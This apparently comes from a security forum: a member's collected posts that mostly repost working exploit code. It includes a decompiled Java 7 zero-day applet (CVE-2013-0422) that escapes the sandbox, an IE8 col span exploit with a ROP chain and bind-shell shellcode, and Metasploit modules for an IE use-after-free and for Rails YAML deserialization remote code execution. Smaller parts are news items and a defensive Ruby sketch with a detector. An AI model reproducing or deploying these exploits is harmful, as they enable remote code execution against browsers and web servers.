Everything posted by Nytro
-
Details:
New year, new Java zeroday! - AlienVault Labs
Malware don't need Coffee: 0 day (CVE-2013-0422) 1.7u10 spotted in the Wild - Disable Java Plugin NOW !
http://pastebin.com/raw.php?i=cUG2ayjh
Exploit Packs updated with New Java Zero-Day vulnerability - Hacking News

[code]
/*
 Java 0day 1.7.0_10 decrypted source
 Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
 From Russia with love.
*/
import java.applet.Applet;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;

// The class header is missing from the decompiled paste; the class name is assumed.
public class Exploit extends Applet {

    // Decode a hex string into the raw bytes of the class that is defined
    // through the privileged class loader below.
    public byte[] hex2Byte(String paramString) {
        byte[] arrayOfByte = new byte[paramString.length() / 2];
        for (int i = 0; i < arrayOfByte.length; i++) {
            arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
        }
        return arrayOfByte;
    }

    // Hex-encoded class bytes; the value itself is not reproduced on this page.
    public static String ByteArrayWithSecOff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

    public void init() {
        try {
            byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);

            // MBeanInstantiator.findClass() hands back classes from the restricted
            // sun.org.mozilla.javascript.internal package that an applet may not
            // reference directly.
            JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
            JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
            MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
            ClassLoader a = null;
            Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
            Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);

            // findConstructor/findVirtual are called through a MethodHandle rather
            // than directly, so the untrusted applet frame is hidden from the
            // reflection access checks.
            MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
            MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
            MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
            MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
            MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
            Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);   // new Context()

            MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
            MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
            MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
            MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
            Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });   // Context.createClassLoader(null)

            // GeneratedClassLoader.defineClass() defines the embedded class outside
            // the applet sandbox; once it is instantiated, exec() goes through.
            MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
            MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2, "defineClass", localMethodType5 });
            Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
            localClass3.newInstance();

            Runtime.getRuntime().exec("calc.exe");
        } catch (Throwable ex) {}
    }
}
[/code]
-
Ruby on Rails XML Processor YAML Deserialization Code Execution
Nytro replied to Nytro's topic in Exploituri
Details:
https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156
https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156
Ronin - Rails PoC exploits for CVE-2013-0156 and CVE-2013-0155
-
Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
Nytro replied to Nytro's topic in Exploituri
PS: Author: sickness
-
[h=1]Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass[/h]

[code]
<!--
** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
** Author: sickness@offsec.com
** Thanks to Ryujin and Dookie for their help.
####################################################################
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php
** Tested on Windows 7 (x86) - IE 8.0.7601.17514
####################################################################
** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak
** To get it working on a different version of Windows you will require to make your own changes to the exploit
** Have fun
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>

function strtoint(str) {
    return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

var free = "EEEE";
while ( free.length < 500 ) free += free;

var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;

var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;

var fr = new Array();
var al = new Array();
var bl = new Array();

var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";

// Fill the heap with 0x100-byte strings and button layouts, then free every
// other "free" string so the leaked object lands in a predictable hole.
for (var i=0; i < 500; i+=2) {
    fr[i] = free.substring(0, (0x100-6)/2);
    al[i] = string1.substring(0, (0x100-6)/2);
    bl[i] = string2.substring(0, (0x100-6)/2);
    var obj = document.createElement("button");
    div_container.appendChild(obj);
}

for (var i=200; i<500; i+=2 ) {
    fr[i] = null;
    CollectGarbage();
}

// cbuttonlayout is the leaked mshtml address; every gadget is an offset from it.
function heapspray(cbuttonlayout) {
    CollectGarbage();

    var rop = cbuttonlayout + 4161;          // RET
    var rop = rop.toString(16);
    var rop1 = rop.substring(4,8);
    var rop2 = rop.substring(0,4);           // } RET

    var rop = cbuttonlayout + 11360;         // POP EBP
    var rop = rop.toString(16);
    var rop3 = rop.substring(4,8);
    var rop4 = rop.substring(0,4);           // } RET

    var rop = cbuttonlayout + 111675;        // XCHG EAX,ESP
    var rop = rop.toString(16);
    var rop5 = rop.substring(4,8);
    var rop6 = rop.substring(0,4);           // } RET

    var rop = cbuttonlayout + 12377;         // POP EBX
    var rop = rop.toString(16);
    var rop7 = rop.substring(4,8);
    var rop8 = rop.substring(0,4);           // } RET

    var rop = cbuttonlayout + 642768;        // POP EDX
    var rop = rop.toString(16);
    var rop9 = rop.substring(4,8);
    var rop10 = rop.substring(0,4);          // } RET

    var rop = cbuttonlayout + 12201;         // POP ECX --> Changed
    var rop = rop.toString(16);
    var rop11 = rop.substring(4,8);
    var rop12 = rop.substring(0,4);          // } RET

    var rop = cbuttonlayout + 5504544;       // Writable location
    var rop = rop.toString(16);
    var writable1 = rop.substring(4,8);
    var writable2 = rop.substring(0,4);      // } RET

    var rop = cbuttonlayout + 12462;         // POP EDI
    var rop = rop.toString(16);
    var rop13 = rop.substring(4,8);
    var rop14 = rop.substring(0,4);          // } RET

    var rop = cbuttonlayout + 12043;         // POP ESI --> changed
    var rop = rop.toString(16);
    var rop15 = rop.substring(4,8);
    var rop16 = rop.substring(0,4);          // } RET

    var rop = cbuttonlayout + 63776;         // JMP EAX
    var rop = rop.toString(16);
    var jmpeax1 = rop.substring(4,8);
    var jmpeax2 = rop.substring(0,4);        // } RET

    var rop = cbuttonlayout + 85751;         // POP EAX
    var rop = rop.toString(16);
    var rop17 = rop.substring(4,8);
    var rop18 = rop.substring(0,4);          // } RET

    var rop = cbuttonlayout + 4936;          // VirtualProtect()
    var rop = rop.toString(16);
    var vp1 = rop.substring(4,8);
    var vp2 = rop.substring(0,4);            // } RET

    var rop = cbuttonlayout + 454843;        // MOV EAX,DWORD PTR DS:[EAX]
    var rop = rop.toString(16);
    var rop19 = rop.substring(4,8);
    var rop20 = rop.substring(0,4);          // } RET

    var rop = cbuttonlayout + 234657;        // PUSHAD
    var rop = rop.toString(16);
    var rop21 = rop.substring(4,8);
    var rop22 = rop.substring(0,4);          // } RET

    var rop = cbuttonlayout + 408958;        // PUSH ESP
    var rop = rop.toString(16);
    var rop23 = rop.substring(4,8);
    var rop24 = rop.substring(0,4);          // } RET

    // ROP chain: set up registers for VirtualProtect() via PUSHAD, then jump
    // into the now-executable shellcode.
    var shellcode = unescape("%u"+rop1+"%u"+rop2);           // RET
    shellcode+= unescape("%u"+rop3+"%u"+rop4);               // POP EBP
    shellcode+= unescape("%u"+rop5+"%u"+rop6);               // XCHG EAX,ESP
    shellcode+= unescape("%u"+rop3+"%u"+rop4);               // POP EBP
    shellcode+= unescape("%u"+rop3+"%u"+rop4);               // POP EBP
    shellcode+= unescape("%u"+rop7+"%u"+rop8);               // POP EBX
    shellcode+= unescape("%u1024%u0000");                    // Size 0x00001024
    shellcode+= unescape("%u"+rop9+"%u"+rop10);              // POP EDX
    shellcode+= unescape("%u0040%u0000");                    // 0x00000040
    shellcode+= unescape("%u"+rop11+"%u"+rop12);             // POP ECX
    shellcode+= unescape("%u"+writable1+"%u"+writable2);     // Writable Location
    shellcode+= unescape("%u"+rop13+"%u"+rop14);             // POP EDI
    shellcode+= unescape("%u"+rop1+"%u"+rop2);               // RET
    shellcode+= unescape("%u"+rop15+"%u"+rop16);             // POP ESI
    shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);         // JMP EAX
    shellcode+= unescape("%u"+rop17+"%u"+rop18);             // POP EAX
    shellcode+= unescape("%u"+vp1+"%u"+vp2);                 // VirtualProtect()
    shellcode+= unescape("%u"+rop19+"%u"+rop20);             // MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop21+"%u"+rop22);             // PUSHAD
    shellcode+= unescape("%u"+rop23+"%u"+rop24);             // PUSH ESP
    shellcode+= unescape("%u9090%u9090");                    // crap
    shellcode+= unescape("%u9090%u9090");                    // crap

    // Bind shellcode on 4444
    shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
    "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
    "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
    "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
    "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
    "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
    "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
    "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
    "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
    "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
    "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
    "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
    "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
    "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
    "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
    "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
    "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
    "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
    "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
    "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
    "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
    "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
    "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
    "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
    "%u006a%uff53%u41d5");

    while (shellcode.length < 100000) shellcode = shellcode + shellcode;

    var onemeg = shellcode.substr(0, 64*1024/2);
    for (i=0; i<14; i++) {
        onemeg += shellcode.substr(0, 64*1024/2);
    }
    onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

    var spray = new Array();
    for (i=0; i<100; i++) {
        spray[i] = onemeg.substr(0, onemeg.length);
    }
}

// First, a small span overflow that only overwrites the neighbouring string
// with a CButtonLayout pointer (the info leak).
function leak(){
    var leak_col = document.getElementById("132");
    leak_col.width = "41";
    leak_col.span = "19";
}

// Read the leaked pointer back out of the adjacent string and rebase the chain.
function get_leak() {
    var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
    str_addr = str_addr - 1410704;
    setTimeout(function(){heapspray(str_addr)}, 200);
}

// Second, the real overflow that hijacks control flow.
function trigger_overflow(){
    var evil_col = document.getElementById("132");
    evil_col.width = "1178993";
    evil_col.span = "44";
}

setTimeout(function(){leak()}, 300);
setTimeout(function(){get_leak()},700);
//setTimeout(function(){heapspray()}, 900);
setTimeout(function(){trigger_overflow()}, 1200);
</script>
</body>
</html>
[/code]

Source: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
-
[h=1]Microsoft Internet Explorer Option Element Use-After-Free[/h]

[code]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Microsoft Internet Explorer Option Element Use-After-Free",
      'Description'    => %q{
        This module exploits a vulnerability in Microsoft Internet Explorer. A memory
        corruption may occur when the Option cache isn't updated properly, which allows
        other JavaScript methods to access a deleted Option element, and results in code
        execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ivan Fratric',  # Initial discovery
          'juan vazquez',  # Metasploit
          'sinn3r'         # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2011-1996' ],
          [ 'MSB', 'MS11-081' ],
          [ 'URL', 'http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html' ],
          [ 'URL', 'http://pastebin.com/YLH725Aj' ]
        ],
      'Payload'        =>
        {
          'StackAdjustment' => -3500,
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ],
          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre,    'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ],
          [ 'IE 8 on Windows 7',      { 'Rop' => :jre,    'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 11 2011",   # MS11-081 shipped in October 2011 (the paste said 2012)
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def get_target(agent)
    # If the target is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def ie_heap_spray(my_target, p)
    js_code        = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops        = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
    js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

    js = %Q|
    function heap_spray() {
      var heap_obj = new heapLib.ie(0x20000);
      var code = unescape("#{js_code}");
      var nops = unescape("#{js_nops}");
      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{my_target['Offset']});
      var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block = shellcode.substring(0, (0x80000-6)/2);
      heap_obj.gc();
      for (var i=1; i < 0x300; i++) {
        heap_obj.alloc(block);
      }
      var overflow = nops.substring(0, 10);
    }
    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
      @heap_spray_func = js.sym("heap_spray")
    end

    return js
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
      rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length)
      rop_payload << "\xeb\x04"              # jmp $+6
      rop_payload << [0x77c15ed5].pack("V")  # 0x0c0c0c0 # stackpivot => xchg eax, esp # ret
      rop_payload << code
    else
      print_status("Using JRE ROP")
      rop_payload = generate_rop_payload('java', '')
      rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length)
      rop_payload << "\xeb\x08"              # jmp $+10
      rop_payload << [0x7c348b05].pack("V")  # stackpivot => xchg eax, esp # ret
      rop_payload << [0x7c348b05].pack("V")  # stackpivot => xchg eax, esp # ret
      rop_payload << code
    end

    return rop_payload
  end

  def load_exploit_html(my_target, cli)
    @heap_spray_func = "heap_spray"
    p  = get_payload(my_target, cli)
    js = ie_heap_spray(my_target, p)

    #var fakeobj = unescape("%u0c0c%u0c0c"); #call to 0c0c0c0c
    #eax ==> 0c0c0a14
    html = %Q|
    <!DOCTYPE html>
    <html>
    <head>
    <script>
    #{js}
    function ivan() {
      var fakeobj = unescape("%u0a14%u0c0c");
      fakeobj += unescape("%u4141%u4141");
      while (fakeobj.length <= 0x38/2) fakeobj += unescape("%u4141%u4141");

      var formobj, selobj, optobj;
      selobj = document.getElementById("select1");
      formobj = selobj.form;

      var imgarray = new Array();
      for(var j = 0; j < 500; j++) {
        imgarray.push(document.createElement("img"));
      }

      for(var i=0;i<5;i++) {
        optobj = document.createElement('option');
        optobj.text = "test";
        selobj.add(optobj);
      }

      selobj.innerText = "foo";

      for(var i = 0; i < imgarray.length; i++) {
        imgarray[i].title = fakeobj.substring(0, 0x38 / 2 - 1);
      }

      #{@heap_spray_func}();
      formobj.reset();
    }
    </script>
    </head>
    <body onload='ivan()'>
    <form method="post">
      <select id="select1">
      </select>
    </form>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = load_exploit_html(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status("Sending HTML...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end
[/code]

Source: Microsoft Internet Explorer Option Element Use-After-Free
-
[h=1]Ruby on Rails XML Processor YAML Deserialization Code Execution[/h]

[code]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStagerTFTP
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails XML Processor YAML Deserialization Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in the XML request
        processor of the Ruby on Rails application framework. This vulnerability allows
        an attacker to instantiate a remote object, which in turn can be used to execute
        any ruby code remotely in the context of the application. This module has been
        tested across multiple versions of RoR 3.x and RoR 2.x
      },
      'Author'         =>
        [
          'charlisome', # PoC
          'espes',      # PoC and Metasploit module
          'lian',       # Identified the RouteSet::NamedRouteCollection vector
          'hdm'         # Module merge/conversion/payload work
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-0156'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156']
        ],
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        =>
        [
          ['Automatic', {} ]
        ],
      'DisclosureDate' => 'Jan 7 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
        OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
      ], self.class)

    register_evasion_options(
      [
        OptBool.new('XML::PadElement', [ true, 'Pad the exploit request with randomly generated XML elements', true])
      ], self.class)
  end

  #
  # This stub ensures that the payload runs outside of the Rails process
  # Otherwise, the session can be killed on timeout
  #
  def detached_payload_stub(code)
    %Q^
    code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first
    if RUBY_PLATFORM =~ /mswin|mingw|win32/
      inp = IO.popen("ruby", "wb") rescue nil
      if inp
        inp.write(code)
        inp.close
      end
    else
      if ! Process.fork()
        eval(code) rescue nil
      end
    end
    ^.strip.split(/\n/).map{|line| line.strip}.join("\n")
  end

  #
  # Create the YAML document that will be embedded into the XML
  #
  def build_yaml_rails2
    # Embed the payload with the detached stub
    code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
    yaml =
      "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
      "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
      "eval(%[#{code}].unpack(%[m0])[0]);' " +
      ": !ruby/object:ActionController::Routing::Route\n  segments: []\n  requirements:\n    " +
      ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n      :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
      ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
    yaml
  end

  #
  # Create the YAML document that will be embedded into the XML
  #
  def build_yaml_rails3
    # Embed the payload with the detached stub
    code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
    yaml =
      "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
      "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
      "eval(%[#{code}].unpack(%[m0])[0]);' " +
      ": !ruby/object:OpenStruct\n  table:\n    :defaults: {}\n"
    yaml
  end

  #
  # Create the XML wrapper with any desired evasion
  #
  def build_request(v)
    xml = ''
    elo = Rex::Text.rand_text_alpha(rand(12)+4)

    if datastore['XML::PadElement']
      xml << "<#{elo}>"
      1.upto(rand(1000)+50) do
        el = Rex::Text.rand_text_alpha(rand(12)+4)
        tp = ['string', 'integer'][ rand(2) ]
        xml << "<#{el} type='#{tp}'>"
        xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) )
        xml << "</#{el}>"
      end
    end

    el = Rex::Text.rand_text_alpha(rand(12)+4)
    xml << "<#{el} type='yaml'>"
    xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
    xml << "</#{el}>"

    if datastore['XML::PadElement']
      1.upto(rand(1000)+50) do
        el = Rex::Text.rand_text_alpha(rand(12)+4)
        tp = ['string', 'integer'][ rand(2) ]
        xml << "<#{el} type='#{tp}'>"
        xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) )
        xml << "</#{el}>"
      end
      xml << "</#{elo}>"
    end

    xml
  end

  #
  # Send the actual request
  #
  def exploit
    print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
    res = send_request_cgi({
      'uri'    => datastore['URIPATH'] || "/",
      'method' => datastore['HTTP_METHOD'],
      'ctype'  => 'application/xml',
      'data'   => build_request(3)
    }, 25)
    handler

    print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
    res = send_request_cgi({
      'uri'    => datastore['URIPATH'] || "/",
      'method' => datastore['HTTP_METHOD'],
      'ctype'  => 'application/xml',
      'data'   => build_request(2)
    }, 25)
    handler
  end

end
[/code]

Source: Ruby on Rails XML Processor YAML Deserialization Code Execution
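The module above, and the Rapid7 write-ups linked in the earlier CVE-2013-0156 post, need a live Rails target to show what `type='yaml'` actually does to a request. The following is an added example written for this page; it is not part of the Metasploit module and not Rails code. It reproduces the vulnerable typecast with the Ruby standard library only: a deliberately minimal stand-in for ActiveSupport's `Hash.from_xml` (flat `<name type='...'>body</name>` children of one root element, nothing more) that hands a `yaml`-typed body to a full YAML load, the patched table that simply drops that typecast, a `safe_load` variant for applications that insist on keeping YAML, and a request-level detector. The function names, the typecast tables and the sample request are all constructed for the example; the sample carries a harmless `!ruby/object:OpenStruct` document, the same class the Rails 3 gadget in the module uses, rather than a payload.

```ruby
require 'yaml'
require 'ostruct'

# Added example for this page, not the Metasploit module above and not Rails code.
# Core of CVE-2013-0156: the Rails 2/3 XML parameter parser honoured a
# type="yaml" attribute and passed the element body to YAML.load, which
# instantiates whatever class the document names. The XML handling below is a
# minimal stand-in for ActiveSupport's Hash.from_xml (flat children of one
# root element only).

# Psych 4 (Ruby 3.1+) made YAML.load safe by default; the 2013 behaviour is
# what unsafe_load does now, so use whichever spelling this interpreter has.
FULL_YAML_LOAD = YAML.respond_to?(:unsafe_load) ? YAML.method(:unsafe_load) : YAML.method(:load)

# Pre-patch typecast table: the "yaml" entry is the vulnerability.
UNSAFE_TYPECASTS = {
  'integer' => ->(v) { v.to_i },
  'string'  => ->(v) { v },
  'yaml'    => ->(v) { FULL_YAML_LOAD.call(v) },
}.freeze

# What the fix in Rails 3.2.11 / 3.1.10 / 3.0.19 / 2.3.15 amounts to: the
# yaml (and symbol) typecasts are gone, so the element body stays a String.
SAFE_TYPECASTS = UNSAFE_TYPECASTS.reject { |type, _| type == 'yaml' }.freeze

# Parse the children of the root element into a params-style Hash, applying
# the typecast named by each element's type attribute (hypothetical helper).
def params_from_xml(xml, typecasts)
  inner = xml[%r{\A\s*<(\w+)>(.*)</\1>\s*\z}m, 2] || xml
  inner.scan(%r{<(\w+)(?:\s+type=['"]([\w-]+)['"])?>(.*?)</\1>}m)
       .each_with_object({}) do |(name, type, body), params|
    caster = typecasts[type]
    params[name] = caster ? caster.call(body) : body
  end
end

# If an application must keep accepting YAML, this is the minimum: only the
# core YAML types are allowed, so a tagged Ruby object is refused instead of
# being instantiated.
def safe_yaml_typecast(body)
  YAML.safe_load(body)
rescue Psych::DisallowedClass
  :rejected
end

# Cheap request-level detection for a log search or a reverse proxy rule: a
# legitimate client never needs to ask Rails for a yaml or symbol typecast.
def suspicious_xml_params?(xml)
  xml.match?(/type\s*=\s*['"](?:yaml|symbol)['"]/i)
end

# Constructed request body (not captured traffic) shaped like the module's
# build_request(3) output, but with a harmless document: it only builds an
# OpenStruct, the class the Rails 3 gadget above abuses.
MALICIOUS_XML = <<XML
<request>
<name type='string'>alice</name>
<count type='integer'>3</count>
<exploit type='yaml'>--- !ruby/object:OpenStruct
table:
  :defaults: {}
</exploit>
</request>
XML

if __FILE__ == $0
  vuln  = params_from_xml(MALICIOUS_XML, UNSAFE_TYPECASTS)
  fixed = params_from_xml(MALICIOUS_XML, SAFE_TYPECASTS)
  puts "vulnerable parser built:  #{vuln['exploit'].class}"    # OpenStruct
  puts "patched parser kept:      #{fixed['exploit'].class}"   # String
  puts "safe_load on that body:   #{safe_yaml_typecast(fixed['exploit']).inspect}"
  puts "flagged by the detector:  #{suspicious_xml_params?(MALICIOUS_XML)}"
end
```

Run it with a plain `ruby` interpreter; no gems are needed. The point to take from the first two lines of output is that the class named inside the request, not anything in the application, decides what gets constructed, which is why the module's real gadget (`NamedRouteCollection` plus a route whose name contains Ruby code) turns the same parser path into `eval`. The detector is deliberately crude: it catches the module's request as posted, but an attacker who controls the whole body can vary quoting and whitespace, so it belongs in a log review, not in place of the upgrade.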
-
[h=1]Expert Finds Java 1.7 Zero-Day on High-Profile Website[/h]
January 10th, 2013, 14:29 GMT · By Eduard Kovacs

The security expert known as Kafeine, the curator of the Malware Don’t Need Coffee website, has come across a new Java zero-day. The vulnerability affects the latest Java 1.7 and it has been found on a website that allegedly records hundreds of thousands of hits each day.

Experts from AlienVault have analyzed the exploit and they've shown that a malicious Java applet can be used to execute code (in their example, the Calculator application from Windows).

“The Java file is highly obfuscated but based on the quick analysis we did the exploit is probably bypassing certain security checks tricking the permissions of certain Java classes as we saw in CVE-2012-4681,” AlienVault’s Jaime Blasco explained.

Researchers from Bitdefender are also analyzing the zero-day which, they say, has been integrated into the recently developed Cool exploit kit.

While more details of the vulnerability come to light, experts advise users to disable Java and avoid clicking on suspicious links.

Source: Expert Finds Java 1.7 Zero-Day on High-Profile Website - Softpedia
-
[h=1]REPT Reverse Engineering[/h]
